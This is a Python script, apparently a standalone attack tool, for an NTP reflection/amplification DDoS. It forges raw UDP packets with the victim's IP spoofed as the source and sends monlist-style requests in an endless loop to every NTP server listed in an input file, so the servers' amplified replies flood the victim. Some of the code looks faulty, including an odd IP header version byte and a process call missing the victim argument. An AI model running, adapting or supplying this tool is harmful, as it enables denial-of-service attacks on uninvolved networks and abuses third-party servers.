from multiprocessing import Process import socket from sys import * from struct import * """ (c) Alexander Pickering 2013-2016 With code from http://www.binarytides.com/ A DDOS attack that leverages NPT servers, Requires an input file, with each ntp on a different line """ class targetOne(): def __init__(self, target, victim): payload = b'\x17\x00\x03\x2a\x00\x00\x00\x00' gid = 54321 s = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_RAW) #Create the socket ipheader = pack('!BBHHHBBH4s4s', 85, #IHL version 0, #Type of service 0, #Total length, will automatically fill in correct lenghth gid, #Global id of this packet 0, #Fragment offset 255, #Time to live socket.IPPROTO_UDP, #Protocol 0, #Header checksum, will automatically fill socket.inet_aton(victim), #Spoof the victim's ip as our own, so data gets sent there socket.inet_aton(target)) #The NTP server udpheader = pack('!HHHH', 0, #Source port 123, #Destination port for NTP 0, #Length, automatically filled in 0) #Checksum, filled in later pseudoheader = pack('!4s4sBBH', socket.inet_aton(victim), #Spoof source address socket.inet_aton(target), #The NTP server 0, #Placeholder for length socket.IPPROTO_UDP, len(udpheader+payload)) #Length of the packet brokepacket = pseudoheader + udpheader + payload #create an incorrect packet check = self.checksum(brokepacket) #Get the checksum udpheader = pack('!HHHH', 0, 123, 0, check) #Re-create the udp packet with the correct checksum packet = ipheader + udpheader + payload #The final packet to send print("Sending packet:\n" + str(packet)) print("Attacking!!!\n press ctrl+c to stop") while(True): s.sendto(packet,(target,0)) #Send the packet ##Checksum function taken from http://www.binarytides.com/ def checksum(self, msg): s = 0 for i in range(0,len(msg),2): par1 = ord(chr(msg[i])) par2 = ord(chr(msg[i+1])) w=par1 + (par2 << 8) s=s+w s=(s>>16)+(s&0xffff); s=s+(s>>16); s=~s&0xffff return s class ntpspam(): def f(self, victim = None, filename = None): if(victim == None): victim = input("IP of victim:\n") if(filename == None): ntpfilename = input("Name of file containting ntp servers\n") else: ntpfilename = filename ntpfile = open(ntpfilename, 'rb', buffering = 0) done = False ip = '' returned = False x = 0 processes = {} while(not done): char = ntpfile.read(1) char = str(char)[2:-1] if(char == '\\n' and returned): print("useing ntp " + ip) returned = False p = Process(target = self.makeOne, args=(ip,)) p.start() processes[x] = p x += 1 ip = '' elif(char == '\\r'): returned = True elif(not char == ''): ip += char else: done = True print("done,useing ntp " + ip) returned = False p = Process(target = self.makeOne, args=(ip,victim,)) p.start() processes[x] = p x += 1 ip = '' ntpfile.close() def makeOne(self, ip, victim): one = targetOne(ip, victim) if(__name__ == '__main__'): try: n = ntpspam() n.f() except Exception as e: crash = open('crash.log', 'w') crash.write(str(e)) crash.close()